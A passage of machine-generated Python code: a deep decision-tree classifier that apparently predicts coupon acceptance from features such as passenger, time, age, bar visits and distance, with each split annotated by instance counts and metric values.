# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]<=1:
# {"feature": "Age", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[4]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3333, "depth": 8}
if obj[6]<=0:
# {"feature": "Time", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[1]<=2:
# {"feature": "Children", "instances": 6, "metric_value": 0.2222, "depth": 10}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=5:
# {"feature": "Time", "instances": 22, "metric_value": 0.0909, "depth": 7}
if obj[1]>0:
return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 8}
if obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.0, "depth": 9}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Distance", "instances": 527, "metric_value": 0.4617, "depth": 4}
if obj[12]>1:
# {"feature": "Bar", "instances": 356, "metric_value": 0.4414, "depth": 5}
if obj[8]<=2.0:
# {"feature": "Time", "instances": 323, "metric_value": 0.4297, "depth": 6}
if obj[1]>0:
# {"feature": "Age", "instances": 252, "metric_value": 0.4492, "depth": 7}
if obj[4]>1:
# {"feature": "Occupation", "instances": 178, "metric_value": 0.4665, "depth": 8}
if obj[7]<=16:
# {"feature": "Gender", "instances": 164, "metric_value": 0.4816, "depth": 9}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 83, "metric_value": 0.4907, "depth": 10}
if obj[10]>0.0:
# {"feature": "Education", "instances": 59, "metric_value": 0.4734, "depth": 11}
if obj[6]<=3:
# {"feature": "Children", "instances": 53, "metric_value": 0.4936, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 37, "metric_value": 0.4909, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Children", "instances": 6, "metric_value": 0.0, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Education", "instances": 24, "metric_value": 0.4127, "depth": 11}
if obj[6]>0:
# {"feature": "Children", "instances": 21, "metric_value": 0.4505, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.497, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 81, "metric_value": 0.4567, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Education", "instances": 64, "metric_value": 0.4742, "depth": 11}
if obj[6]<=1:
# {"feature": "Children", "instances": 37, "metric_value": 0.4556, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 28, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Children", "instances": 27, "metric_value": 0.4937, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4922, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4959, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.3252, "depth": 11}
if obj[5]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1905, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Education", "instances": 8, "metric_value": 0.4688, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.4688, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>16:
# {"feature": "Education", "instances": 14, "metric_value": 0.2143, "depth": 9}
if obj[6]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.3, "depth": 10}
if obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[6]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Occupation", "instances": 74, "metric_value": 0.3665, "depth": 8}
if obj[7]<=22:
# {"feature": "Restaurant20to50", "instances": 73, "metric_value": 0.3587, "depth": 9}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 66, "metric_value": 0.3934, "depth": 10}
if obj[6]>1:
# {"feature": "Gender", "instances": 43, "metric_value": 0.4059, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 32, "metric_value": 0.3744, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3856, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.3879, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3401, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 18, "metric_value": 0.3333, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[7]>22:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 71, "metric_value": 0.2679, "depth": 7}
if obj[5]>0:
# {"feature": "Age", "instances": 41, "metric_value": 0.3777, "depth": 8}
if obj[4]<=3:
# {"feature": "Restaurant20to50", "instances": 31, "metric_value": 0.4424, "depth": 9}
if obj[10]>-1.0:
# {"feature": "Occupation", "instances": 28, "metric_value": 0.4762, "depth": 10}
if obj[7]>0:
# {"feature": "Gender", "instances": 27, "metric_value": 0.4889, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 15, "metric_value": 0.4571, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4898, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]>2:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.5, "depth": 12}
if obj[6]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=0:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
elif obj[4]>3:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 33, "metric_value": 0.4127, "depth": 6}
if obj[5]<=0:
# {"feature": "Time", "instances": 21, "metric_value": 0.4286, "depth": 7}
if obj[1]>0:
# {"feature": "Age", "instances": 18, "metric_value": 0.4643, "depth": 8}
if obj[4]<=1:
# {"feature": "Occupation", "instances": 14, "metric_value": 0.4762, "depth": 9}
if obj[7]>2:
# {"feature": "Education", "instances": 8, "metric_value": 0.4667, "depth": 10}
if obj[6]<=0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[3]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[6]<=4:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>1:
# {"feature": "Education", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[6]<=1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 10}
if obj[3]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[7]<=18:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Age", "instances": 12, "metric_value": 0.2381, "depth": 7}
if obj[4]>2:
# {"feature": "Time", "instances": 7, "metric_value": 0.381, "depth": 8}
if obj[1]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4444, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[6]<=2:
# {"feature": "Occupation", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[7]<=12:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[4]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[12]<=1:
# {"feature": "Occupation", "instances": 171, "metric_value": 0.4644, "depth": 5}
if obj[7]>1.3264107549745603:
# {"feature": "Age", "instances": 137, "metric_value": 0.4449, "depth": 6}
if obj[4]<=2:
# {"feature": "Education", "instances": 76, "metric_value": 0.4768, "depth": 7}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 67, "metric_value": 0.4602, "depth": 8}
if obj[10]>-1.0:
# {"feature": "Time", "instances": 59, "metric_value": 0.4807, "depth": 9}
if obj[1]<=3:
# {"feature": "Children", "instances": 43, "metric_value": 0.4776, "depth": 10}
if obj[5]<=0:
# {"feature": "Bar", "instances": 27, "metric_value": 0.451, "depth": 11}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.3929, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 13, "metric_value": 0.3538, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Bar", "instances": 16, "metric_value": 0.3, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.3167, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4042, "depth": 10}
if obj[3]<=0:
# {"feature": "Bar", "instances": 10, "metric_value": 0.4444, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 9, "metric_value": 0.4815, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>1.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2667, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
# {"feature": "Bar", "instances": 8, "metric_value": 0.2, "depth": 9}
if obj[8]<=-1.0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[8]>-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Bar", "instances": 9, "metric_value": 0.0, "depth": 8}
if obj[8]<=0.0:
return 'True'
elif obj[8]>0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>2:
# {"feature": "Restaurant20to50", "instances": 61, "metric_value": 0.3305, "depth": 7}
if obj[10]>0.0:
# {"feature": "Time", "instances": 38, "metric_value": 0.1887, "depth": 8}
if obj[1]>0:
# {"feature": "Bar", "instances": 31, "metric_value": 0.1105, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 27, "metric_value": 0.0673, "depth": 10}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.1455, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>1:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2143, "depth": 9}
if obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.0, "depth": 10}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Bar", "instances": 23, "metric_value": 0.4174, "depth": 8}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.4125, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.2727, "depth": 10}
if obj[6]<=3:
# {"feature": "Time", "instances": 11, "metric_value": 0.2525, "depth": 11}
if obj[1]<=3:
# {"feature": "Children", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>3:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 8, "metric_value": 0.2083, "depth": 10}
if obj[5]<=0:
# {"feature": "Time", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[6]<=0:
return 'True'
elif obj[6]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]<=1.3264107549745603:
# {"feature": "Education", "instances": 34, "metric_value": 0.444, "depth": 6}
if obj[6]>1:
# {"feature": "Age", "instances": 18, "metric_value": 0.2738, "depth": 7}
if obj[4]<=4:
# {"feature": "Time", "instances": 14, "metric_value": 0.1429, "depth": 8}
if obj[1]>0:
return 'True'
elif obj[1]<=0:
# {"feature": "Bar", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[8]>-1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 8}
if obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 9}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[1]<=3:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Age", "instances": 16, "metric_value": 0.3571, "depth": 7}
if obj[4]>2:
# {"feature": "Time", "instances": 9, "metric_value": 0.3333, "depth": 8}
if obj[1]<=3:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.1667, "depth": 9}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 10}
if obj[3]<=1:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=1:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.0, "depth": 8}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[2]<=1:
# {"feature": "Bar", "instances": 2281, "metric_value": 0.4567, "depth": 2}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 1601, "metric_value": 0.4408, "depth": 3}
if obj[5]>0:
# {"feature": "Occupation", "instances": 804, "metric_value": 0.3945, "depth": 4}
if obj[7]>1.5424315569353801:
# {"feature": "Time", "instances": 645, "metric_value": 0.4151, "depth": 5}
if obj[1]<=3:
# {"feature": "Coffeehouse", "instances": 565, "metric_value": 0.4343, "depth": 6}
if obj[9]<=2.0:
# {"feature": "Distance", "instances": 447, "metric_value": 0.4578, "depth": 7}
if obj[12]<=2:
# {"feature": "Restaurant20to50", "instances": 352, "metric_value": 0.4701, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Education", "instances": 327, "metric_value": 0.4631, "depth": 9}
if obj[6]<=2:
# {"feature": "Direction_same", "instances": 242, "metric_value": 0.4459, "depth": 10}
if obj[11]<=0:
# {"feature": "Passanger", "instances": 174, "metric_value": 0.4624, "depth": 11}
if obj[0]>1:
# {"feature": "Age", "instances": 90, "metric_value": 0.4263, "depth": 12}
if obj[4]<=6:
# {"feature": "Gender", "instances": 83, "metric_value": 0.4108, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[4]>6:
# {"feature": "Gender", "instances": 7, "metric_value": 0.3429, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=1:
# {"feature": "Age", "instances": 84, "metric_value": 0.4503, "depth": 12}
if obj[4]<=2:
# {"feature": "Gender", "instances": 47, "metric_value": 0.4908, "depth": 13}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>2:
# {"feature": "Gender", "instances": 37, "metric_value": 0.3935, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Passanger", "instances": 68, "metric_value": 0.383, "depth": 11}
if obj[0]<=1:
# {"feature": "Age", "instances": 58, "metric_value": 0.3577, "depth": 12}
if obj[4]<=4:
# {"feature": "Gender", "instances": 44, "metric_value": 0.3202, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4317, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[0]>1:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[3]<=0:
# {"feature": "Age", "instances": 5, "metric_value": 0.4, "depth": 13}
if obj[4]<=1:
return 'True'
elif obj[4]>1:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 5, "metric_value": 0.2, "depth": 13}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>2:
# {"feature": "Passanger", "instances": 85, "metric_value": 0.455, "depth": 10}
if obj[0]<=2:
# {"feature": "Direction_same", "instances": 73, "metric_value": 0.4729, "depth": 11}
if obj[11]<=0:
# {"feature": "Age", "instances": 50, "metric_value": 0.4387, "depth": 12}
if obj[4]>2:
# {"feature": "Gender", "instances": 32, "metric_value": 0.4023, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[4]<=2:
# {"feature": "Gender", "instances": 18, "metric_value": 0.4722, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.475, "depth": 12}
if obj[3]<=0:
# {"feature": "Age", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[4]<=6:
return 'False'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Age", "instances": 11, "metric_value": 0.2828, "depth": 13}
if obj[4]<=3:
return 'True'
elif obj[4]>3:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Age", "instances": 12, "metric_value": 0.2593, "depth": 11}
if obj[4]<=6:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1905, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[4]>6:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Age", "instances": 25, "metric_value": 0.419, "depth": 9}
if obj[4]<=4:
# {"feature": "Education", "instances": 21, "metric_value": 0.4894, "depth": 10}
if obj[6]<=3:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4167, "depth": 11}
if obj[3]>0:
# {"feature": "Passanger", "instances": 10, "metric_value": 0.4167, "depth": 12}
